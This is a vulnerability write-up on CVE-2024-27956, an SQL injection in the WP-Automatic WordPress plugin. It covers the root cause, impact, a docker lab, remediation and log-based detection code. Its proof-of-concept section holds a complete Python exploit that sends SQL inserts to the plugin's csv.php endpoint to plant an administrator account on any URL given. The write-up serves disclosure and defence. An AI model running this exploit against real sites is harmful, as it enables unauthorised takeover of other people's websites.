CVE-2024-27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)

Md Nahid Alam
Jun 7, 2024

Introduction

CVE-2024-27956 refers to a critical SQL injection (SQLi) vulnerability discovered in the WP-Automatic plugin, a popular content automation tool for WordPress websites. This vulnerability allows unauthenticated attackers to execute arbitrary SQL queries on the affected website’s database, potentially leading to complete website compromise.

Technical Details

The vulnerability resides within the user authentication mechanism of the WP-Automatic plugin. Specifically, it is present in one of the plugin’s core files responsible for handling user login requests. The code suffers from improper sanitization of user-provided input, allowing attackers to inject malicious SQL code into the login process.
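The root cause described above is the general SQL injection pattern: untrusted input becomes part of the SQL text instead of being passed as data. The following example is added here to illustrate that pattern; it is not WP-Automatic's code and uses a constructed in-memory SQLite table rather than the plugin's real schema. It places the vulnerable string-splicing form next to the parameterized form, which is the fix the plugin's authors had to make.

```python
import sqlite3


def make_db():
    """Constructed sample database (not the WordPress schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (user_login, role) VALUES (?, ?)",
        [("alice", "administrator"), ("bob", "subscriber")],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn, user_login):
    """Vulnerable pattern: the caller's input is spliced into the SQL text,
    so quotes and operators in the input change the meaning of the query."""
    sql = "SELECT user_login, role FROM users WHERE user_login = '%s'" % user_login
    return conn.execute(sql).fetchall()


def find_user_safe(conn, user_login):
    """Hardened form: the input travels as a bound parameter and can only ever
    be compared as a value, never parsed as SQL."""
    sql = "SELECT user_login, role FROM users WHERE user_login = ?"
    return conn.execute(sql, (user_login,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # A value that is harmless as data but rewrites the WHERE clause when spliced in.
    tainted = "' OR '1'='1"
    print("unsafe:", find_user_unsafe(conn, tainted))  # every row is returned
    print("safe:  ", find_user_safe(conn, tainted))    # no such user: []
```

In WordPress plugin code the equivalent of the bound parameter is `$wpdb->prepare()`; any query that is assembled from request data without it should be treated as a finding during a code review.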

Attack Scenario

Crafting a Malicious Request

An attacker can send a specially crafted login request containing malicious SQL code. This code could be designed to achieve various malicious goals, such as:

  1. Creating New Administrator Accounts: By injecting SQL queries that manipulate the WordPress user table, attackers can create new user accounts with administrator privileges.
  2. Stealing Sensitive Data: Malicious SQL queries can be used to extract sensitive information from the database, such as usernames, passwords (hashed or in plaintext depending on storage method), and website content.
  3. Uploading Web Shells: Injected SQL can potentially grant attackers the ability to upload malicious files like web shells to the server, allowing for persistent remote access.

Exploiting the Vulnerability

When the crafted login request is submitted to the vulnerable plugin, the malicious SQL code bypasses the intended security measures and gets executed directly on the website’s database server.

Gaining Control

Depending on the attacker’s objectives, the injected SQL code can manipulate the database to grant them unauthorized access, steal sensitive data, or establish persistence on the compromised website.

Impact

A successful exploit of CVE-2024-27956 can have severe consequences for website owners, including:

  • Website Takeover: Attackers can gain complete control over the compromised website, allowing them to deface it, inject malicious content, or redirect visitors to phishing sites.
  • Data Theft: Sensitive user information, website content, and other confidential data can be stolen by attackers.
  • SEO Spam: Attackers might inject spam content into the website, negatively impacting its Search Engine Optimization (SEO) ranking.
  • Malware Distribution: The compromised website can be used as a platform to distribute malware to unsuspecting visitors.

Exploitation (Proof of Concept)

Setting Up the Lab

To demonstrate the proof of concept, we’ll set up a local environment hosting a WordPress instance with the vulnerable version of WP-Automatic Plugin installed and activated on it. Use the following docker-compose configuration to host the victim WordPress site on port 8080:

version: '3.1'
services:
  wordpress:
    image: wordpress
    restart: always
    ports:
      - 8080:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: exampleuser
      WORDPRESS_DB_PASSWORD: examplepass
      WORDPRESS_DB_NAME: exampledb
    volumes:
      - wordpress:/var/www/html
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_DATABASE: exampledb
      MYSQL_USER: exampleuser
      MYSQL_PASSWORD: examplepass
      MYSQL_RANDOM_ROOT_PASSWORD: '1'
    volumes:
      - db:/var/lib/mysql
volumes:
  wordpress:
  db:

Start the Docker containers:

docker-compose up

Access your WordPress site on http://localhost:8080 and complete the installation.

Exploit Script

Here’s a Python script to exploit CVE-2024-27956 and create an administrator user:

import requests
import sys

def makeRequest(payload, hash, url):
    # Derive the Host header from the target URL
    host = url.split('/', 3)[2]
    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
    }
    # The SQL statement goes in 'q', with its integrity value in 'integ'
    data = {
        'q': payload,
        'auth': b'\0',
        'integ': hash
    }
    response = requests.post(url, data=data, headers=headers)
    return response

def helpUsage():
    print("[+] You must run the exploit passing the WordPress URL. \n[+] Example: python exploit.py http://website.com")
    quit()

def verifyArgs(argv):
    if len(argv) != 2:
        helpUsage()

verifyArgs(sys.argv)
print("[+] Exploit for CVE-2024-27956")
domain = sys.argv[1]
url = domain + '/wp-content/plugins/wp-automatic/inc/csv.php'

# First request (create user)
print("[+] Creating user eviladmin")
response = makeRequest("INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')", "09956ea086b172d6cf8ac31de406c4c0", url)
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
    print("[+] Error in the payload")
    quit()

if "DATE" not in response.text:
    print("[+] Not vulnerable")
    quit()

# Second request (give permission); keep the response so the checks below
# inspect this request rather than the previous one
print("[+] Giving eviladmin administrator permissions")
response = makeRequest("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')", "bd98494b41544b818fa9f583dadfa2bb", url)
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
    print("[+] Error in the payload")
    quit()
print("[+] Exploit completed!")
print("[+] Administrator created: eviladmin:admin")

Executing the Script

Run the script with the URL of your hosted WordPress site:

python3 exploit.py http://localhost:8080

Try logging into the admin panel using the newly created user eviladmin with the password admin.

Remediation

The developers of WP-Automatic have addressed this vulnerability in version 3.9.2.0. It is imperative to update the WP-Automatic plugin to this version or later as soon as possible. Additionally, website owners should consider the following measures:

  • Implement a Web Application Firewall (WAF): A WAF can help detect and block malicious traffic, including attempts to exploit SQL injection vulnerabilities.
  • Maintain Strong Passwords: Enforce strong password policies for all WordPress user accounts, including administrator accounts.
  • Regular Security Audits: Conduct regular security audits to identify and address potential vulnerabilities on the website.
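Two of the measures above can be turned into concrete checks. The example below is added here and is not part of the original post or of the WP-Automatic project: it flags requests to the plugin's `inc/csv.php` endpoint (the path the exploit section posts to) in web server access logs, and it compares an installed plugin version against the fixed version 3.9.2.0. The log lines and the plugin header text are constructed samples; the `Version:` header field is the standard WordPress plugin header, but the exact file it lives in for this plugin is not stated on the page and is assumed here.

```python
import re

# Endpoint used by the published exploit and the first fixed version, both
# taken from the text above.
CSV_ENDPOINT = "/wp-content/plugins/wp-automatic/inc/csv.php"
FIXED_VERSION = "3.9.2.0"

# Apache/nginx "combined" access-log layout.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_csv_endpoint_hits(lines):
    """List (ip, timestamp, method, status) for every request to the csv.php endpoint.
    Any method is reported; POSTs are the ones the exploit uses, so triage those first."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        if path == CSV_ENDPOINT:
            hits.append((rec["ip"], rec["ts"], rec["method"], rec["status"]))
    return hits


def version_tuple(version):
    """'3.9.1' -> (3, 9, 1); comparison is numeric, not lexical."""
    return tuple(int(part) for part in version.split("."))


def is_patched(installed_version):
    """True when the installed version is 3.9.2.0 or later; shorter version strings
    are right-padded with zeros so '3.9.2' compares equal to '3.9.2.0'."""
    a, b = version_tuple(installed_version), version_tuple(FIXED_VERSION)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) >= b + (0,) * (width - len(b))


def plugin_version_from_header(header_text):
    """Extract the 'Version:' field from a WordPress plugin file header."""
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9.]+)", header_text, re.MULTILINE)
    return m.group(1) if m else None


# Constructed sample data for a stand-alone run.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Apr/2024:16:26:43 +0000] "POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [30/Apr/2024:16:27:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/Apr/2024:16:26:44 +0000] "POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [30/Apr/2024:16:30:10 +0000] "GET /wp-content/plugins/wp-automatic/inc/csv.php?x=1 HTTP/1.1" 200 64 "-" "curl/8.0"',
    "this line is not in combined format",
]

SAMPLE_HEADER = """/*
 * Plugin Name: Automatic
 * Version: 3.9.1.0
 */"""

if __name__ == "__main__":
    for hit in find_csv_endpoint_hits(SAMPLE_LOG):
        print("csv.php request:", hit)
    ver = plugin_version_from_header(SAMPLE_HEADER)
    print("installed", ver, "patched:", is_patched(ver))
```

The log check is a starting point for hunting, not proof of compromise: a hit from an unexpected client, especially a POST followed shortly by a new administrator account in `wp_users`, is what warrants a closer look at the database and file system.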

Conclusion

CVE-2024-27956 is a serious vulnerability that can be exploited by attackers to gain unauthorized access to websites using the WP-Automatic plugin. By promptly updating the plugin, implementing additional security measures, and maintaining good security hygiene, website owners can significantly reduce the risk of compromise.